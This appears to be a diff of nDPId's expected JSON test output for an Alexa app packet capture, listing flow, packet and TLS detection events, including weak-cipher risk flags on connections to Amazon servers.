+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lftAAEAGejesECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9NXQAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwImlAAOcGRtU27xyyrBAq2AG7xmzGEdgp79UQ8XASH\/7SVwAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} 
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} 
+01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} 
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1490976180796,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976180796,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} 
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 